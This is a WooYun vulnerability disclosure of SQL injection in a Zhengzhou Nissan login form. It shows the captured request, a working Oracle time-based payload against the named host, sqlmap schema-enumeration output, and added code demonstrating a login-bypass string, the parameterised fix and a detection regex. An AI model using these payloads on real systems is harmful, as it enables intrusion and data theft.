
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0156351

Title: SQL injection in a Zhengzhou Nissan management system, exposing large amounts of data

Vendor: 郑州日产汽车有限公司 (Zhengzhou Nissan Automobile Co., Ltd.)

Author: 路人甲

Submitted: 2015-11-27 15:48

Fix time: 2016-01-11 15:58

Public disclosure: 2016-01-11 15:58

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-27: details sent to the vendor, awaiting vendor handling
2015-11-27: vendor confirmed; details disclosed to the vendor only
2015-12-07: details disclosed to core white hats and domain experts
2015-12-17: details disclosed to regular white hats
2015-12-27: details disclosed to intern white hats
2016-01-11: details disclosed to the public

Brief description:

As in the title: a large amount of database information.

Detailed description:

0x01 Vulnerability location

eip.zznissan.com.cn:2051

Still the electric-vehicle management system; earlier I only tried weak passwords, so here is a deeper test.
0x02 Vulnerability type

SQL injection, at the login form


0x03 Vulnerability details
At the login form

(screenshot of the login page; image not available)


Captured the POST request and found that the body is JSON; promising~~~

POST /Data/UserManagement.svc/LoginForWebUser HTTP/1.1
Host: eip.zznissan.com.cn:2051
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://eip.zznissan.com.cn:2051/indexLogin.htm
Content-Length: 35
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"UserName":"aaa","Password":"aaa"}
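The request above is what makes this finding interesting: the login handler takes the JSON fields and, as the sqlmap result later shows, lets them change the structure of the SQL it runs. The following is an added example, not the report's code and not the vendor's application; it uses sqlite3 as an offline stand-in for the Oracle back end, a constructed `web_users` table and constructed sample bodies, and places the concatenation anti-pattern beside the bound-parameter version that closes the hole. It also covers the remediation that the report's fix section leaves to the vendor.

```python
import json
import sqlite3


def make_db():
    """Constructed in-memory store standing in for the report's Oracle database.
    A real system compares salted password hashes; plaintext is used here only
    to keep the injection behaviour visible."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE web_users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO web_users VALUES ('alice', 'correct-horse')")
    return conn


def build_query_unsafe(body):
    """The anti-pattern behind the report: JSON fields spliced into SQL text."""
    data = json.loads(body)
    return (
        "SELECT username FROM web_users WHERE username = '%s' AND password = '%s'"
        % (data["UserName"], data["Password"])
    )


def login_unsafe(conn, body):
    """Vulnerable login: returns the authenticated username, or None."""
    row = conn.execute(build_query_unsafe(body)).fetchone()
    return row[0] if row else None


def login_safe(conn, body):
    """Same lookup with bound parameters: the values are passed to the driver
    separately from the SQL text, so input can never alter the query structure."""
    data = json.loads(body)
    row = conn.execute(
        "SELECT username FROM web_users WHERE username = ? AND password = ?",
        (data["UserName"], data["Password"]),
    ).fetchone()
    return row[0] if row else None


def unsafe_path_errors(conn, body):
    """True if the concatenated query fails at the SQL parser. With the report's
    Oracle-only DBMS_PIPE call, sqlite raises here; on the real back end the same
    input would instead produce the 5-second delay sqlmap measured."""
    try:
        login_unsafe(conn, body)
        return False
    except sqlite3.Error:
        return True


# Constructed sample bodies in the shape of the request captured in the report.
GOOD_BODY = '{"UserName":"alice","Password":"correct-horse"}'
# Constructed tautology using the same quote-breakout shape as the report's payload.
TAUTOLOGY_BODY = '{"UserName":"alice\' OR \'pfws\'=\'pfws","Password":"wrong"}'
# The payload sqlmap reported against the site (Oracle time-based blind).
REPORT_BODY = (
    '{"UserName":"aaa\' AND 7527=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(104)'
    '||CHR(117)||CHR(112),5) AND \'pfws\'=\'pfws","Password":"aaa"}'
)


if __name__ == "__main__":
    db = make_db()
    print("unsafe, good creds   :", login_unsafe(db, GOOD_BODY))
    print("unsafe, tautology    :", login_unsafe(db, TAUTOLOGY_BODY))
    print("safe,   tautology    :", login_safe(db, TAUTOLOGY_BODY))
    print("unsafe query text    :", build_query_unsafe(REPORT_BODY))
    print("unsafe path errors   :", unsafe_path_errors(db, REPORT_BODY))
    print("safe,   report body  :", login_safe(db, REPORT_BODY))
```

With the tautology body the concatenated query becomes `username = 'alice' OR 'pfws'='pfws' AND password = 'wrong'`, and because AND binds tighter than OR it authenticates `alice` without the password; the bound-parameter version treats the whole string as a username and finds nothing. Binding parameters is the fix regardless of database; input filtering on top of it is defence in depth, not a substitute.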


0x04 Exploitation
Testing with sqlmap is enough.

Proof of vulnerability:

0x05 Proof of results
And so a large amount of data was found.
Injection details

sqlmap identified the following injection points with a total of 101 HTTP(s) requests:
---
Place: (custom) POST
Parameter: JSON #1*
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: {"UserName":"aaa' AND 7527=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(104)||CHR(117)||CHR(112),5) AND 'pfws'='pfws","Password":"aaa"}
---
[13:46:38] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
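The sqlmap summary above carries two signals a defender can act on: the payload text itself (quote breakout, CHR() concatenation and the Oracle DBMS_PIPE.RECEIVE_MESSAGE delay primitive) and the timing, since a time-based blind probe makes the login endpoint answer seconds late and sqlmap needed 101 requests from one client. The following detector is an added example, not part of the report or the vendor's systems; the log format (timestamp, client, method, path, status, elapsed milliseconds, JSON body), the sample lines and the 4-second threshold are constructed assumptions, and the signature list is the Oracle set relevant to this page (other engines have their own delay functions).

```python
import json
import re
from collections import defaultdict

# Constructed sample access log; one line per login POST, body kept verbatim.
SAMPLE_LOG = """\
2015-11-27T13:46:01 203.0.113.7 POST /Data/UserManagement.svc/LoginForWebUser 200 120 {"UserName":"aaa","Password":"aaa"}
2015-11-27T13:46:02 203.0.113.7 POST /Data/UserManagement.svc/LoginForWebUser 200 118 {"UserName":"aaa'","Password":"aaa"}
2015-11-27T13:46:38 203.0.113.7 POST /Data/UserManagement.svc/LoginForWebUser 200 5210 {"UserName":"aaa' AND 7527=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(104)||CHR(117)||CHR(112),5) AND 'pfws'='pfws","Password":"aaa"}
2015-11-27T13:47:10 198.51.100.9 POST /Data/UserManagement.svc/LoginForWebUser 200 131 {"UserName":"o'neil","Password":"hunter2"}
"""

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) "
    r"(?P<status>\d+) (?P<ms>\d+) (?P<body>.*)$"
)
# Oracle delay primitives used by time-based blind probing (assumed signature set).
DELAY_PRIMITIVES = re.compile(
    r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP|UTL_INADDR\.", re.I
)
# CHR(n)|| chains used to build string literals without quote characters.
CHR_CONCAT = re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I)
# A closing quote followed by a boolean operator: the breakout shape in the report.
QUOTE_BREAKOUT = re.compile(r"'\s*(AND|OR)\s+", re.I)
SLOW_MS = 4000  # assumed threshold; the report's payload sleeps 5 s, a login answers in well under 1 s


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ms"] = int(rec["ms"])
    try:
        rec["fields"] = json.loads(rec["body"])
    except ValueError:
        rec["fields"] = {}  # malformed JSON is left for a separate check
    return rec


def score_request(rec):
    """Return the sorted list of reasons a login request looks like SQL injection probing."""
    reasons = set()
    for value in rec["fields"].values():
        if not isinstance(value, str):
            continue
        if DELAY_PRIMITIVES.search(value):
            reasons.add("delay-primitive")
        if CHR_CONCAT.search(value):
            reasons.add("chr-concat")
        if QUOTE_BREAKOUT.search(value):
            reasons.add("quote-breakout")
    if rec["ms"] >= SLOW_MS:
        reasons.add("slow-response")
    return sorted(reasons)


def analyze(log_text, login_path):
    """Scan the log for the login endpoint: returns (alerts, requests per client).
    The per-client count supports a volume rule; sqlmap needed 101 requests here."""
    alerts = []
    per_client = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != login_path:
            continue
        per_client[rec["client"]] += 1
        reasons = score_request(rec)
        if reasons:
            alerts.append((rec["ts"], rec["client"], reasons))
    return alerts, dict(per_client)


if __name__ == "__main__":
    found, counts = analyze(SAMPLE_LOG, "/Data/UserManagement.svc/LoginForWebUser")
    for ts, client, reasons in found:
        print(ts, client, ", ".join(reasons))
    print("requests per client:", counts)
```

A lone apostrophe, as in `o'neil`, is deliberately not flagged: it appears in real names, and the report's interesting request is the one that combines the breakout with a delay primitive and a multi-second response. Combining the content signature with the timing anomaly keeps the false-positive rate low on a login endpoint, and the per-client count gives the volume signal on which to rate-limit.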


Database information

available databases [24]:
[*] "IX\X02"
[*] "OWBSYS!"
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTMN
[*] PM
[*] RICHAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


Fetching table data is then straightforward; I did not go further here.

[15:38:08] [INFO] fetching database (schema) names
[15:38:08] [INFO] fetching number of databases
[15:38:08] [INFO] resumed: 24
[15:38:08] [INFO] resumed: APEX_030200
[15:38:08] [INFO] resumed: APPQOSSYS
[15:38:08] [INFO] resumed: CTXSYS
[15:38:08] [INFO] resumed: DBSNMP
[15:38:08] [INFO] resumed: EXFSYS
[15:38:08] [INFO] resumed: FLOWS_FILES
[15:38:08] [INFO] resumed: HR
[15:38:08] [INFO] resumed: IX\x02
[15:38:08] [INFO] resumed: MDSYS
[15:38:08] [INFO] resumed: OE
[15:38:08] [INFO] resumed: OLAPSYS
[15:38:08] [INFO] resumed: ORDDATA
[15:38:08] [INFO] resumed: ORDSYS
[15:38:08] [INFO] resumed: OUTMN
[15:38:08] [INFO] resumed: OWBSYS!
[15:38:08] [INFO] resumed: PM
[15:38:08] [INFO] resumed: RICHAN
[15:38:08] [INFO] resumed: SCOTT
[15:38:08] [INFO] resumed: SH
[15:38:08] [INFO] resumed: SYS
[15:38:08] [INFO] resumed: SYSMAN
[15:38:08] [INFO] resumed: SYSTEM
[15:38:08] [INFO] resumed: WMSYS
[15:38:08] [INFO] resumed: XDB
[15:38:08] [INFO] fetching tables for databases: 'IX, OWBSYS!, APEX_030200, APPQOSSYS, CTXSYS, DBSNMP, EXFSYS, FLOWS_FILES, HR, MDSYS, OE, OLAPSYS, ORDDATA, ORDSYS, OUTMN, PM, RICHAN, SCOTT, SH, SYS, SYSMAN, SYSTEM, WMSYS, XDB'
[15:38:08] [INFO] fetching number of tables for database 'ORDSYS'
[15:38:08] [INFO] resumed: 5
[15:38:08] [INFO] resumed: SI_IMAGE_FORMATS_TAB
[15:38:08] [INFO] resumed: SI_FEATURES_TAB
[15:38:08] [INFO] resumed: SI_VALUES_TABA
[15:38:08] [INFO] resumed: ORD_USAGE_RECS
[15:38:08] [INFO] resumed: ORD_CARTRIDGE_COMPONENTS
[15:38:08] [INFO] fetching number of tables for database 'HR'
[15:38:08] [INFO] resumed: 7
[15:38:08] [INFO] resumed: REGIONS
[15:38:08] [INFO] resumed: LOCATIONS!
[15:38:08] [INFO] resumed: DEPARTMENTS
[15:38:08] [INFO] resumed: JOBS
[15:38:08] [INFO] resumed: EMPLOYEES
[15:38:08] [INFO] resumed: JOB_HISTORY
[15:38:08] [INFO] resumed: CQUNTRIES
[15:38:08] [INFO] fetching number of tables for database 'APEX_030200'
[15:38:08] [INFO] resumed: 360
[15:38:08] [INFO] resumed: WWV_FLOW_COMPANIES
[15:38:08] [INFO] resumed: WWV_FLOW_ACTIVITY_LOG_NUMBER%
[15:38:08] [INFO] resumed: WWV_FLOW_USER_ACCESS_LOG_NUM$
[15:38:08] [INFO] resumed: WWV_FLOW_DUAL100


Tested, done.

Remediation:

Leave it to the vendor.

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-27 15:57

Vendor reply:

A tragedy of weak passwords. The reporter was thorough. Thanks!

Latest status:

None yet